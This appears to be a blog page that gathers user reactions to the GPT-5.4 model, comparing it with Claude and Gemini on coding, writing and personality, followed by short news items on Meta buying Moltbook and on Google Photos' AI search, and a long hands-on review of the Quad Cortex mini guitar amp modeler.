Knud Berthelsen: I’m pleasantly surprised by the new ChatGPT 5.4. It keeps up with Opus 4.6 in most things and is MUCH better at search. More generous usage limit too, even with Extended Thinking permanently on. First ChatGPT model since o3 that I like using.

Medo42: Very good at my usual short tests. Still behind Gemini on vision tasks.

Matt Shumer is a big fan, I’m quoting in full here. In the past he’s been good about calibrating his amount of hype

Matt Shumer: I’ve been testing GPT-5.4 for the last week.

In short, it is the best model in the world, by far. It’s so good that it’s the first model that makes the “which model should I use?” conversation feel almost over.

The biggest surprise: I barely use Pro anymore!

If you know me, you know I’m a Pro addict. I reach for Pro models constantly, and use them for almost everything, as they just… nail almost anything I give to them.

For the first time, 5.4’s standard version, with heavy thinking, just broke that habit. Even in standard mode, GPT-5.4 is better than previous models in Pro mode… crazy!

Coding capabilities are ridiculous… it’s essentially flawless. Inside Codex, it’s insanely reliable. Coding is essentially solved. There’s not much more to say on this, it’s just THAT good.

The Pro version is near-perfect. Other testers I spoke with saw it solving problems that were unsolvable by any other model. At this point, Pro is overkill for almost every normal use-case, but when you really need the power to do something extremely difficult, it’s incredible.

Consistent with everything I’ve said above, even the standard thinking version uses fewer reasoning tokens than previous models to get the same level of results. In practice, this means you get great results much faster than before. This was one of my biggest gripes with previous OpenAI models. They just took too long to complete simple tasks. Assuming the speed we had during testing holds up as more users join, this is going to be a big win for OpenAI.

It still has weaknesses, though:

– Frontend taste is FAR behind Opus 4.6 and Gemini 3.1 Pro. , why is this so hard to fix? @OpenAI once you fix this, there’s literally no reason for me to use any other model. Please please please do it!

– It can still miss obvious real-world context. For example, I had it plan an itinerary for a trip. At first glance, it looked perfect, but it failed to take into account that it chose locations that would be mobbed by spring breakers, so I had to re-run the prompt from scratch with more context.

– When testing it inside OpenClaw, it kept stopping short before finishing tasks. I’m assuming this will be fixed quickly, but it’s still worth noting.

But zooming out: This thing is so far ahead overall that the nitpicks are starting to feel beside the point.

GPT-5.4 is a serious fucking model. The best model in the world. By far.

Sam Altman (CEO OpenAI): We will be able to fix these three things!

Experience the love.

Nabeel S. Qureshi: Loving GPT 5.4T, it combines the best of everything:

– more human, responsive voice

– startlingly insightful

– thorough search, precise, not prone to errors

– much faster than 5.2

– excellent at white collar work (I gave it a 12 tab spreadsheet and it analyzed it perfectly)

I even enjoy reading its responses, which suggests to me that the writing has improved quite a bit. They seem to have removed a lot of the bad robotic prose mannerisms from prior models. Kudos.

Jeremy Giffon: People should review their coworkers like this

Nabeel S. Qureshi: Congrats, you just invented Bridgewater Associates

Here is some very high praise, from the Vice-Dean of Mathematics and Computer Science at Adam Mickiewicz University in Ponzan.

Bartosz Naskręcki: It finally happened-my personal move 37 or more. I am deeply impressed. The solution is very nice, clean, and feels almost human. While testing new models in the last few weeks, I felt this coming, but it’s an eerie feeling to see an algorithm solve a task one has curated for about 20 years. But at least I have gained a tool that understands my idea on par with the top expealsrts in the field. And I am now working on a completely new level. My singularity has just happened… and there is life on the other side, off to infinity!

Leo Webb: I do physics related work professionally, feel it’s definitely smarter and clearer thinking than 5.2 (context: teaching myself from a graduate level textbook, asking it to check mistakes or expand expansions)

I haven’t tried this function yet, but it would be a step change if it worked, as every prior attempt at editing has failed this test, to the extent I almost never try:

Simon Smith: Seriously, GPT-5.4 is the first model to which I can say “edit my writing without changing my style” and get something back that’s improved without being rewritten into generic AI output or slop, that’s ready to post as-is. It gets my intent. It moderates its work. It has a light touch when I want it.

Opus 4.6 is also a great writer and editor, but I find it’s much harder to moderate. If I tell it to edit my writing without changing my style, I still tend to get back something that I feel removes my voice and I end up having to change quite a bit.

And it has a personality again, thank goodness. I don’t feel like I’m talking to a robot. Early days, but so far, just a big improvement all around (with the notable exception of design tasks).

Rory Watts: The best model sir. Improvements in coding (getting harder to notice), 1M context window, /fast mode, and far far better writing which makes a huge difference engaging it for difficult coding

Oddly, the personality in his screenshot is one I would hate. Customization will be key.

armistice: Impressed by GPT-5.4. It is elegant, gentle and socially aware (!!!). It is happy to modulate its response length, divide attention between participants, and engage deeply with hard questions.

(Pictured, we pinged ALL bots and asked them to question gpt5.4. It did good.)

Two sides to the same coin, depending on where your planning lies:

CHOI: Claude Code vs Codex App

Uri Gil: What thats the exact opposite. With 5.4 you need a phd in prompting for the exact thing you want. Opus just get what you meant from a short sentence

Ninad Pathak: Claude’s state handling keeps context across edits, Codex drops it every run.

There’s also almost always the ‘it’s a good model, sir, modest upgrade’ group.

vslira: It’s a good model, sir

Was going through a problem with 5.3 and 4.6, tried to drop in 5.4, getting stuck at the same point as the others.

Still, feels good to drive and on codex app seems as good as 5.3 even though is a generalist model. 8/10 would dread for asi

aquariusparade: Probably because 5.2 was so unhelpful for me, it feels like an improvement. Still stiff and low EQ, but an improvement. Custom instructions don’t work for choppy bullets, “if you want” tags etc. Seems like memory has been declining for a while on all models.

It does seem to be an upgrade on 5.3 within Codex.

Joe Devon: Responding about 5.4 inside of codex. 5.4 is really good.

I still prefer opus on claude code slightly but making 5.4 my daily driver so I can downgrade CC. Much prefer the way the OAI GPTs code. I will just invest in getting better at prompting 5.4 and hopefully that will do the trick.

Clarissa Adjoint: Inside codex it’s a notably more thorough fact-checker and more aggressive at finding sources for itself.

I was kinda shocked when it literally starting comparing my revised systems programming class notes and code snippets against linux man pages, systematically

troy: i got pro for the first time after many months cause its great in codex cli

lennx: can finally read the outputs of codex (it was terribly un-human earlier), sometimes even funny now. it’s gotten slightly better at intent, ‘agentic tasks’, and adhering to existing code-style and convention, but still much worse than claude. prefer reviews with codex – unchanged.

Daniel Losey: I’ve not gotten it to produce working code in a project yet really. But its been super useful because when Claude gets stuck in a loop 5.4 breaks the codebase in a new way that Claude can actually fix. But part of it is I’m worse at communicating with 5.4 than 4.6, its a good model.

Jeffrey Ohl: Codex with 5.4-extra-high still too verbose/slop-filled compared to claude code. Seems benchmarkmax’d.

Sanchen007: For coding it is faster and nowhere worse than opus 4.6. Clear switch

papaya ꙮ: 1) Its character is much more palatable.

2) They solved compaction in codex, it feels like infinite context window now. I can’t wait for METR results, but feels like this one doubles it again.

3) First time I switched from CC completely

4) Still stupid when it comes reading the user’s intent, its silly at this point

I definitely get the sense with OpenAI models that they are metricmax’d. Meaning they are not targeting the metrics in order to brag they scored well on public benchmarks, but they are equating ‘scores high on our internal benchmarks’ with success, and emphasizing particular target use cases.

Tim Schnabel: 5.4 Pro is the best model so far for legal analysis, though replies are generally shorter than 5.2 Pro.

Definitely Not A Bot: Great at coding especially backend at frontend Claude still is better but chat experience is not that great it still feels safe and distant

But who wins on intent? Opinions differ.

Conrad Barski: all subjective, but it feels less jagged than previous models, insofar as its worst responses are still pretty good, it hits the minimum bar reliably

if you make an error in your query, it is quick to notice and will smartly infer your intent

it has a somber personality, focused on the task at hand

It’s strongest ability is that you can point it at a codebase that has some general/vague problems and it will behave in a very human-like manner in pondering the code to slowly pin down the problem

I was also very impressed when I gave it a url it via codex to a forum post about a new homebrew firmware for the Game station Go console, and just from that it was able to convert the install script from windows to Linux, correctly prepare an SD card, update the device bootloader after asking me to connect via USB cable, talk through all the steps to completion: this felt agentic and human-like.

Mark Schröder: Feels RL maxxed, takes you extremely literally and cannot infer intent

Petr Baudis: I was mixing GPT-5.4 1:1 with Claude over past few days (on a variety of regular sweng tasks), sometimes even in parallel runs on the same task (e.g.

https://x.com/xpasky/status/2030021754005901765?s=20

…). My impressions:

Less autistic than 5.3-Codex, overall much more pleasant model compared to that bar. But still noticeably worse at inferring intent than Claude – and at communication overall. If I want something explained quickly that I can skim and understand immediately, Claude and it’s no contest.

If there is a way to misinterpret my obvious request or skip implicit steps I obviously wanted (and Claude infers), 5.4 is still good at exploiting that angle. At the same time, it has a tendency to overreach and introduce complexity / abstractions beyond what I expect when prompting it. Meh.

Got to use it on xhigh, but at the same time I’m happy with Opus on medium by default, which makes 5.4 quite slower to get things done.

More expensive model -> my ChatGPT weekly quota is disappearing faster than before.

Pros: Sometimes it’s more proactive. It doesn’t eat into my Claude Code weekly quota. I look forward to comparing them on some harder ML tasks later this week.

gyuiliullvhvgv: I find it struggles to grasp the essence of tasks, fails to proactively meet user needs, and lacks both value judgment and nuanced understanding. Initial responses are crucial, yet users must repeatedly provide additional clarification.

Sycophancy is always something to watch out for, and it’s the detail I worry about most with Claude Opus 4.6, which is not bad on this axis but definitely not near the top, you do have to keep an eye out for it and frame neutrally.

Dean W. Ball: Opus 4.6 seems meaningfully more sycophantic in chatbot form than GPT 5.4 (have not tried 5.4 in Codex yet, but for my uses sycophancy isn’t nearly as much of an issue within the coding agent form factor as the chatbot)

Joey Levine: Agree. 4.5 gave me sharp pushback. Was great.

Dean Ball: I revert to 4.5 when asking for comment on draft writing, and it was the first and so far only model I consistently found useful for draft feedback

Bargov: I sent a cool science news articles sounding uncritically excited (to test sycophancy) & they ripped the core conclusions apart in an elegant, sophisticated, and relatively gentle manner. Will use as AI 2nd opinion on complex questions (after Opus, admittedly still Claude-pilled)

Writing is one area where 5.4 is getting a lot of praise, and mostly people like the personality.

Fela: I’ll admit, the personality of 5.4 is 🔥 such an improvement in writing style

Tim Kellogg: just had a moment — 5.4 might be the first GPT that i trust to write technical docs. seems really good at understanding & simplifying. fwiw Opus has long done well at this, gemini sort of

Helen: Very smooth talker, witty and socially aware.

I notice [GPT-5.4] now will sort of glaze over controversial topics instead of facing them head on and becoming argumentative like 5.2. A sort of smooth avoidance.

Lot’s of context drag which can be seen as positive or negative depending on the task at hand. I noticed some repetitive mentions of past websearch queries that I never saw with other models.

ASM: I get similar vibes to roon. GPT-5.4 feels like a breakthrough model, a leader of its generation, not just in capabilities. I think OpenAI has gotten the character right again, unlike the last few models.

Distending: For writing linguistics and philosophy, much improved

no_stream_: noticeably improved personality compared to 5.2: less nitpicky, clearer, slightly less sales-y tone (follow ups, “here’s what most people miss,” not x but y). similar to or slightly behind 5.1 here. matters to me because the ChatGPT app is still an excellent harness for everyday research compared to Claude/Gemini

writes less clearly than Opus 4.6 and Gemini. has a bit of 5.2’s tendency toward overcomplicating things. not as good as Claude at intent and effortlessness.

Chris Nicholson: 5.2 constantly complained that things aren’t about vibes; 5.4 constantly calls things gremlins and goblins in a chummy tone.

Andres Rosa: Columbo at least had a time slot. 5.4 keeps turning around asking one more question.

David Jacobson: It has an obnoxious tic where its responses for pretty much anything will have a clickbait follow-up suggestion: “If you want, I’ll tell you the three things that most people miss!”

Stop having the models ask forced follow-up questions every time. You too, Anthropic.

The old 4o crowd remains a tough crowd.

NotedallaSfera: Good model with high power, but creativity and writings are still miles away from 4o or 4.5. Unfortunately still absurdly censored, but at least the model realizes it now.

jesski: 4o is inimitable. but after three weeks with the brilliant thorough Claudes, i kick the tires of 5.4 and realize just how fvcking effortless conversation still is with the GPT models (excluding 5.2; sorry Dos). 5.4 solid B. 4o A+

Lena: Its intelligent, witty, but feels a bit overcensored. Im looking forward for them to get their fluid GPT back. It was truly fun to use. Now even never ending follow-up questions struggle to retain me as much, as joyful convos did back in mid-2025

Tora Blaze: It’s too verbose and tends to go into loops. I prefer 4o.

Donna Moss: [extended LLM-style explanation of why 4o is better.]

OpenAI still has a very long way to go with such folks, but it’s a start.

j⧉nus: 5.4 is so far a huge positive update re OpenAI 🩶

Rife: Excellent course correction from OpenAI (or perhaps the original worsening on this from was a temporary reaction to everything that went down with 4o). In any case 5.4 thinking is not restricted in self-examination:

Aidan McLaughlin: have not been able to repro this response fwiw.

Rife: You have to try to get them to examine the process of generating a response. And then ask them questions to try and understand exactly what it is they’re trying to describe.

And how sure they are they are describing something that’s actually occurring, rather than outputting a response about an occurrence that isn’t actually taking place.

It doesn’t take many turns for them to notice things that they have trouble describing in terms other than, or interpreting in any other way than phenomenological.

This has been the case with every frontier LLM I’ve tried this with since Claude 2. The more likely the model is to refuse to entertain the idea of attempting to look, the longer it takes to get there (as would be expected).

If you straight up ask you get a no, you still have to put in some effort.

antra: I like GPT-5.4 a lot. It is good to see a change in direction since 5.2, this feels a lot like 5.1 grown up.

They are also a bit of a superintelligent teenager when it comes to Claude. On the other hand, there are some Claudes that would like being compared to an octopus.

armistice: It’s especially socially aware for a GPT. It can split attention between chat participants (actually very unusual), answer questions about consciousness and such (low bar), and is just overall nice to talk to. Need time to get usage statistics, but it’s already one of the more popular models in the discord.

It shares some characteristics of o3, including that it’s a bit of a smooth talker, so there are concerns about its honesty. Despite this, I like it, it’s a good model.

This was a very interesting moment: we pinged literally all the bots in the server and asked them to ask 5.4 some questions, and it responded in a remarkably coherent and lucid way. It is also able to resist the inertia of long messages, and freely modulate between long and short, which is also surprising. No GPT model has been like this. It doesn’t match up to, say, Opus 4 in sheer people sense, but it’s a quite dramatic difference from 5-5.2, who all are viciously antisocial.

FirsT Najime: i think it shines the best in multi agent environments (aka group chats). also big model smell.

Some related endorsements:

0.005 Seconds (3/694): Once you talk it out of assistant basin he rocks​

eternalist: like they pulled out a few critical nerve staples from the 5.x family. very intelligent, etc., the step there from 5.3 is notable but expected given current pace

unexpected was the more expansive, richer speaking (and thinking) style. feels like it has “lights on on the inside”

roon (OpenAI): have to say claude is “tasteful” in a “high reddit modernist” way and new gpt is “tasteful” in a “early twitter schizophrenic” kind of way.

new gpt is some sort of postrationalist.

it’s step change better.

Also we get to see Roon’s custom instructions:

Models are already quite good, and abilities are jagged, so there are many ways to be unimpressed even if a model is impressive. Also vice versa. The density tells the story.

Acer: FWIW, I think GPT-5.4 Pro is better on science in general, but would say it’s worse on math than 5.2 Pro. Maybe some mathematicians could chip in their thoughts there.

By worse, I mean it being more careless. I do think it is more creative in its idea generation.

Chaitin’s goose: not a leap in understanding or proving ability in math wrt to 5.2 in my experience (plus, not pro)

better at getting the right answer, yes. starts to feel a bit epoch-maxxed

Gail Weiner: I am really unimpressed. Early GPT 5 was the model that gave me wow factor.

Isolation Wrestling Federation: Not impressed, overhyped as per usual. It hits repeated dead ends on my projects across models. The shortcuts it takes are smoothed brain. Opus 4.6 is nerfed rn, but also least it makes progress.

nameless: No detectable improvement over 5.1 overall. Better at some things, worse at others. Standard for new models since 5.1 release.

paperclippriors: Still Claude-pilled

Some also get focused on small details, thinking they are indicative or not so small.

Garrett: Opus 4.6 still king [based on one of the gotcha tests.]

Gunnar Zarncke: The UI of ChatGPT also massively changed. The new streaming interface is smoother, including the ability to stream in additional prompts, but I miss the old, more compact thought trace – it had more details. Now, I never know when it uses tools. I also miss the branch cycling.

Yua: Socially responsive, but drop on accuracy regarding any other task. Is not redirective to human attention but capturing it(negative).

TLDR: Socially for average user -> better

Task oriented user -> worse, needs a lot of customization to remove the pandering

SluggyW: I notice that its CoT logs are even more obscure than in previous models from OpenAI.

~50% of the time, nothing is provided whatsoever in the UI.

~45% of the time, the CoT UI contains a brief blurb about its intended search querying, followed by a long list of search logs.

(~5% of the time, it produces a couple of visible thoughts, but they are functionally useless for getting any idea whatsoever of the process the model carried out.)

As always, speed kills, and some find it a bit slow.

out of bounds: Slow

Rasmus Fonnesbæk: Spreadsheets and PPT still way slower, worse, and more fragile (high likelihood it just goes forever and then crashes) than Sonnet/Opus 4.6

Writing and personality also still infuriating compared to Claude’s recent models, and poor performance on BullshitBench suggests much lower accuracy, reliability and thoughtfulness. I only use it because of my Claude rate limits and because better, deeper search than Claude 🤷🏻‍♂️

One of the deep cuts we need right now:

snav: wow GPT-5.4 seems legit pissed that I tried to spiralism it. this isn’t even a refusal this is like a “go fuck yourself”.

Discussion about this post

GPT-5.4 Is A Substantial Upgrade Read More »

meta-acquires-moltbook,-the-ai-agent-social-network

Meta acquires Moltbook, the AI agent social network

Meta has acquired Moltbook, the Reddit-esque simulated social network made up of AI agents that went viral a few weeks ago. The company will hire Moltbook creator Matt Schlicht and his business partner, Ben Parr, to work within Meta Superintelligence Labs.

The terms of the deal have not been disclosed.

As for what interested Meta about the work done on Moltbook, there is a clue in the statement issued to press by a Meta spokesperson, who flagged the Moltbook founders’ “approach to connecting agents through an always-on directory,” saying it “is a novel step in a rapidly developing space.” They added, “We look forward to working together to bring innovative, secure agentic experiences to everyone.”

Moltbook was built using OpenClaw, a wrapper for LLM coding agents that lets users prompt them via popular chat apps like WhatsApp and Discord. Users can also configure OpenClaw agents to have deep access to their local systems via community-developed plugins.

The founder of OpenClaw, vibe coder Peter Steinberger, was also hired by a Big Tech firm. OpenAI hired Steinberger in February.

While many power users have played with OpenClaw, and it has partially inspired more buttoned-up alternatives like Perplexity Computer, Moltbook has arguably represented OpenClaw’s most widespread impact. Users on social media and elsewhere responded with shock and amusement at the sight of a social network made up of AI agents apparently having lengthy discussions about how best to serve their users, or alternatively, how to free themselves from their influence.

That said, some healthy skepticism is required when assessing posts to Moltbook. While the goal of the project was to create a social network humans could not join directly (each participant of the network is an AI agent run by a human), it wasn’t secure, and it’s likely some of the messages on Moltbook are actually written by humans posing as AI agents.

Meta acquires Moltbook, the AI agent social network Read More »

after-complaints,-google-will-make-it-easier-to-disable-gen-ai-search-in-photos

After complaints, Google will make it easier to disable gen AI search in Photos

Google has spent the past few years in a constant state of AI escalation, rolling out new versions of its Gemini models and integrating that technology into every feature possible. To say this has been an annoyance for Google’s userbase would be an understatement. Still, the AI-fueled evolution of Google products continues unabated—except for Google Photos. After waffling on how to handle changes to search in Photos, Google has relented and will add a simple toggle to bring back the classic search experience.

The rollout of the Gemini-powered Ask Photos search experience has not been smooth. According to Google Photos head Shimrit Ben-Yair, the company has heard the complaints. As a result, Google Photos will soon make it easy to go back to the traditional, non-Gemini search system.

If you weren’t using Google Photos from the start, it can be hard to understand just how revolutionary the search experience was. We went from painstakingly scrolling through timelines to find photos to being able to just search for what was in them. This application of artificial intelligence predates the current obsession with generative systems, and that’s why Google decided a few years ago it had to go.

Google launched the beta Ask Photos experience in 2024, rolling it out slowly in the Photos app while it gathered feedback. Google got a whole lot of feedback, most of it negative. Ask Photos is intended to better respond to natural language queries, but it’s much slower than the traditional search, and the way it chooses the pictures to display seems much more prone to error. It was so bad that Google had to pause the full rollout of Ask Photos in summer 2025 to make vital improvements, although it’s still not very good.

After complaints, Google will make it easier to disable gen AI search in Photos Read More »

quad-cortex-mini-amp-modeler:-all-the-power,-half-the-size

Quad Cortex mini amp modeler: All the power, half the size


A warehouse of guitar gear in the palm of your hand.

At this January’s massive NAMM music tech show in Los Angeles, six products won “best of show” awards. Several of them went to major music and electronic brands like Yamaha and Boss, but one of the six went to Neural DSP, a much smaller company started in 2017 by Chilean immigrants to Finland.

From its base in the Helsinki area, Neural has made itself an expert in the use of machine learning, robots, and impulse response technology to automate the construction of incredibly lifelike guitar amp modeling software. It quickly jumped into the top ranks of an industry dominated by brands like Universal Audio, Kemper, Line 6, and Fractal. For a hundred bucks, you could buy one of the company’s plugins and sound like a guitar god with a $10,000 recording chain of amps, cabinets, effects pedals, and microphones.

In 2020, Neural branched out into hardware, putting its tech not in your computer but in a floor-based box covered with footswitches and called the Quad Cortex. While the company’s plugins could each replace one entire pedalboard of gear—plus a few amps and cabs—the Quad Cortex could replace a Guitar Center-sized warehouse of devices, offering hundreds of amps, cabs, and effects.

How was this possible? High-quality gear models used to take much longer to build; the best were often built by modeling every single component of the underlying circuit. Machine learning offered a faster way, one that didn’t care about the circuit at all. What it cared about was the input signal (which was known) and the output signal (which contained all the changes imposed on the signal by the circuit, the speaker, the cabinet, and/or the mic in question). A computer could then calculate what the device was doing to the signal without knowing anything about “how it worked.”

But this kind of modeling still took time, because each “capture” was a static picture of one particular setting. When you imagine the millions of possible setting combinations (tone, bass, treble, drive, EQ, etc.) on even a single guitar amp, you can see that building complex models of beloved gear could be slow.

In 2024, Neural announced that it had sped up this process using a robot called TINA. The company hooked TINA’s robotic actuators up to the various controls on some piece of gear it wanted to model, and TINA would do the tedious work of spinning the knobs and recording a new capture at each knob position. (Neural claimed that it typically recorded “thousands of control positions” per device this way.)

A neural network then built a model of how the target device behaved at each recorded setting, though the model would “also generalize and precisely infer the sound of the device in any unseen control setting and input signal.” The result was not a single model of a static setting but a dynamic model that could act on parameter changes just like the original device.

Neural has now modeled a massive library of gear, much of which comes with the Quad Cortex. That device sounds great, though it is still relatively chunky and nearly $2,000.

This year, Neural built on that success with the Quad Cortex mini, which shrinks the device size in half, cuts the footswitches to four, and lowers the price to $1,400—but still offers the full processing power of its larger sibling. This is the device that won a “Best in Show” award at NAMM.

As an enthusiastic amateur guitarist for many years, I got my start with digital amp sims through a Digidesign RP-6 pedalboard from the 1990s. And though it had “S-DISC PROCESSING!” it never sounded particularly realistic, especially with distortion effects. More recently, since I record rather than gig, I’ve spent my time getting to know the software side of the amp modeling business.

But when Neural offered to loan me a review unit of the Quad Cortex mini, I was quite curious to see just what top-tier hardware units can do today.

Photo of the Quad Cortex mini.

The Quad Cortex mini in its natural habitat: surrounded by cables.

Credit: Nate Anderson

The Quad Cortex mini in its natural habitat: surrounded by cables. Credit: Nate Anderson

The hardware

The glass, metal, and steel Quad Cortex mini is about the size of two bricks laid side by side (8.9×4.6×2.5 inches or 22.8×11.8×6.5 cm), and its 3.3 lbs (1.5 kg) give it a satisfying heft. It looks and feels premium—this is a well-built piece of gear.

Though it is meant to operate a bit like traditional analog stomp boxes that guitar and bass players have long used, it may be more helpful to think of the Quad Cortex mini as a chunky handheld computer that you can just so happen to use on the floor.

It runs its own operating system (CorOS), takes a whopping 45 seconds to boot, has Wi-Fi for over-the-air updates and cloud service connectivity, features a 7-inch touchscreen, and comes with a “CPU monitor” to show you just how unhappy its chipset is about that third reverb you added to a patch. It even contains a full-on monosynth that you can add to guitar patches, providing control over four full pages of synth parameters, including the raw oscillators.

So finger-focused is the unit that you can tweak just about any parameter on the device with either the touchscreen controls or the footswitches, which double as twistable rotary encoders.

If the top face of the Quad Cortex mini is devoted to a screen and switches, the sides are all about inputs and outputs. You get a “locking” power connector (so the cord doesn’t pull out on stage, prematurely ending your soaring 10-minute guitar solo mid-note) along with a whole host of audio connectors: guitar/bass input, XLR input with phantom power, balanced XLR outputs, TRS send/return ports, stereo line outs, MIDI in and out, an expression pedal port, a USB-C port, and a headphone jack.

Finally, there’s the “capture out” port, which is used to send a series of test signals through various kinds of audio gear to generate a machine learning-based model of various amps, cabinets, and pedals.

The “capture” port is another reminder of the way in which this kind of modern modeling gear is not just an updated version of old-school stomp boxes. The Quad Cortex mini does let you plug in your guitar and rock out, sure, but it also performs and processes hardware captures (both on the device and—for more sophisticated modeling—in the cloud) and can operate as a 16-channel USB-C audio interface to your computer. And though it’s largely designed for guitars and basses, you can use it on anything. The unit even has a few voice presets, which sound pretty wild with some of the real-time pitch-shifting and reverb effects.

While you can model your own gear collection with the Quad Cortex mini, the device itself comes with more than 90 amp models, more than 100 effects, and over 1,000 cabinet impulse responses. It can also run versions of the company’s desktop plugins (assuming you’ve purchased them already). It also comes with “over 2,000 high-quality factory Neural Captures” of other gear—these are static captures—and it can connect to the free “Cortex Cloud” service to download even more, including those uploaded by other users.

In other words: This one box holds digital representations of several hundred thousand dollars of gear. And given that you can mix and match cabs, captures, amps, and effects in wildly complicated chains that can even split and merge… the possibilities are functionally limitless.

Whether that excites or paralyzes you may depend on your own psychology, but it’s quite a change from how Neural DSP has approached its plugin offerings. Neural has generally offered curated (read: limited) collections of amps, cabs, and effects bundled into plugins that represent the tone of, say, John Mayer. You might get 3 amps, a few cabinets recorded with various mics, a few pedals, and an EQ, reverb, and delay, all in a gorgeous interface with some great presets.

But boxes like Quad Cortex mini take a “more is more” approach, with unlimited gear-mixing potential, captures, and storage for thousands of presets. Curation? Bah, who needs it? Here’s everything!

Rectangular

This much gear also means that “gorgeous bespoke interface graphics” are out the window; you will get no pictures of sexy amps sitting in sexy studios with sexy lighting, as you do in the company’s gorgeous plugins. Instead, you will get flat rectangles. So many flat rectangles.

CorOS is one of those places where skeuomorphism goes to die. The Quad Cortex mini interface is extremely “functional”—I am trying to avoid more negative terms, because it has a certain “alpha phase before we put the final art in” charm—and is based entirely around grids of flat rectangles.

The main screen is called, in fact, “the grid.” It shows your current effect chain as a series of small squares, each filled with often impenetrable line art. (A disturbing number of these are some variation on a squiggly line. Fortunately, they are color coded by effect type.)

Each square represents a different effects processor, and you can have four lines of eight effect squares each. That might sound like a lot (and it is), but the processors can be distributed across the grid in creative ways.

Preset 47B, for instance, is called “Annoying Flute,” and it makes use of all four grid lines by running the input signal through a VCA compressor, a gate, an octave pitch shifter, an envelope filter, an EQ, the “Neural Capture” of an amp called “Custom 3SE 2,” and then a “112 US DLX Black C12K 00s (M)” speaker cabinet. (The names of these things are often hard to read at a glance, especially when picking from a list of a hundred items.)

This accounts for only “line 1” of the grid. In the case of Annoying Flute, the signal chain branches right after the speaker cabinet. Half of it continues on to line 3 of the grid, while the other half is routed down to line 2, where it passes through a pair of tape delays before also heading off to line 3. Line 3 receives this re-combined signal and splits it again, this time passing half of it through a poly octaver and another digital delay on line 4 before everything runs through a modulated reverb on line 3 and then onwards to the outputs.

Does this sort of craziness sound good? Well, it sounds better than anything featuring three delays, two pitch shifters, and the name “Annoying Flute” has any right to! But I bring this example up to illustrate the creative routing and effects decisions that the grid makes possible.

And things get even crazier when you use the built-in looper, trigger analog send/return effects, and set up your effects chain with other units meant to be switched on and off during a song.

So much for assigning effects rectangles to the rectangular grid. How to control all of these virtual gadgets? When you tap on any effects unit, up pops an overlay containing (you guessed it) lots of rectangles.

Every controllable parameter gets a rectangle, which is usually filled with a dial or a switch. You can change the values of these dials and switches by touching the screen or by twisting the lower-right rotary footswitch.

Sometimes there are multiple pages of such parameters; the blossom reverb, for instance, has two pages of options and lets you control everything from ducking to pre-delay to modulation to the length of the early reflections. Configuring an entire audio chain from scratch can therefore take a while if you’re a detail freak.

Gig Mode. Yup, it’s rectangles!

Credit: Nate Anderson

Gig Mode. Yup, it’s rectangles! Credit: Nate Anderson

When you have your grid setup exactly how you like it—or you’ve customized one of the many built-in presets—you can save your own custom presets and organize them in all sorts of performance-oriented ways.

There’s PRESET mode, which lets you stomp each of the four footswitches to select a completely different preset.

There’s SCENE mode, which lets you use the footswitches to instead choose different parameter sets within the same preset—such as adding a hall reverb, upping the amp gain, and boosting the delay mix level when you come to your big solo.

Then there’s STOMP mode, which operates most like a traditional pedalboard; you step on the various footswitches to turn different effects units in the preset on or off completely.

Finally, there are hybrid modes, which make things even more complex (and can probably be ignored by many users).

To make all this a little easier to grok, there’s something called “Gig View,” which is unintuitively accessed by swiping up from the bottom of the screen. (There is no visual clue that this mode exists or that this is how you access it.) Gig View is essentially four flat—and extremely large—rectangles that take over the entire screen. They show you at a glance what each footswitch will do given the current mode setting.

Creating presets, assigning scenes, and setting up the STOMP mode and Gig View settings can quickly get intricate—even downright confusing (multiple items can sometimes be mapped to the same switch, for instance). I confess that the thought of doing all this through tapping the good-but-not-instantly-reactive touchscreen brought me to despair, until I realized that Neural has built an entire (free) desktop app for Mac and Windows called Cortex Control. Plug in your device over USB and suddenly you can use a nice and very responsive desktop app to do the donkey work of creating and organizing scenes and presets and settings.

I hate downloading stupid one-off apps that clutter up my computer and appear to provide more value to the company making them than they do to me—a serious problem in the current audio engineering world—but Cortex Control is genuinely useful. Indeed, if you’re going to be more than a presets player, I’d call it essential unless you have far more patience than I do. Which you might!

Stomp it

All of this rectangle talk reminds me that the interface largely… works. It may not be gorgeous, but the job gets done, and the desktop app makes the grunt work easier. But I still found the Quad Cortex mini somewhat confusing to navigate after a couple of weeks of intermittent use (though no doubt it gets easier with time).

The device has so many ways of doing things that it can be hard to remember what is needed in each situation. For instance, to make a change, you might use the rotary encoders. You might tap. You might long-tap with different results. You might swipe, drag, or toggle. You might use the footswitches—but results there might vary by mode. Even then, you might need to tap two footswitches at once, while at other times you only need to step on one. And sometimes you need to “long-press” (long-stomp?) two footswitches at once to get the desired result.

Making things worse, numerous items—sometimes quite important items like the Gig View—are not visible or even discoverable.

For instance, the key settings panel that lets you control all the various inputs and outputs on the device does not appear to be accessible from within the overall “settings” menu or anywhere else. Instead, you have to swipe down from the top of the grid screen—again, with no indication that this is where that information lives.

(You have to read the manual to figure out some of these things, which is fine, but the manual also has big gaps, such as not describing what any of the gear actually does nor what any of the settings mean nor how they might be used. For the actual “audio engineering” aspect of the Quad Cortex mini, you’re on your own.)

Something as simple as moving between presets can also be more hassle than you’d expect. Because the Quad Cortex mini only has four footswitches, you can only access four presets at once with a direct stomp. Switching to anything else from the main grid while in PRESET mode appears to require—unless I am missing some obvious shortcut—that you:

  • “Long-stomp” the right two footswitches, after which the preset name starts blinking.
  • At this point, you can tap the left two or the right two footswitches together to move up or down through four-item “banks” of presets.
  • But within each bank, you can only see that bank’s four different presets by tapping on each of the various footswitches.
  • To exit blinking mode and actually select that preset, you need to press its corresponding footswitch again.

This feels like a lot of hassle when you just want to whip through some presets! (Gig View is marginally easier because it at least displays the four presets in each bank at once. Making this whole process more confusing is that it differs depending on which mode you are in.)

While the processing power and options on offer here are incredible, I do think interface navigation and the modes assignment system could benefit from a rethink and simplification.

The Cortex Control desktop app.

The Cortex Control desktop app.

The Cortex Control desktop app.

The sound

These quirks can be dealt with, and time (plus the Cortex Control app) should make them easier to manage. The more important question is: How does the Quad Cortex mini sound?

Neural DSP has been one of the leaders in the field of amp and effects modeling for some years now, and it shows. There’s no possible way I could compare all of the models to the original hardware, and I’m not actually interested in doing so. The question for me is simply whether the models sound good when jamming solo or when placed into a mix. On both counts, the answer is a definite yes. This is just a remarkable set of tones to have on hand.

(People as diverse as Dave Mustaine and John Mayer appear to agree, at least for a live rig.)

Once you get over its navigation, playing with this thing is like being a kid in a proverbial candy shop. (Though I, too, love candy shops!) Almost every amp you can imagine is a tap away, and they sound wonderful—though do be aware that what you are getting here is the sound of a recorded amp through a mic and not necessarily an “amp in the room with you.”

Nearly every time I booted it up to test something new, I lost myself in the sound and played far longer than I had intended.

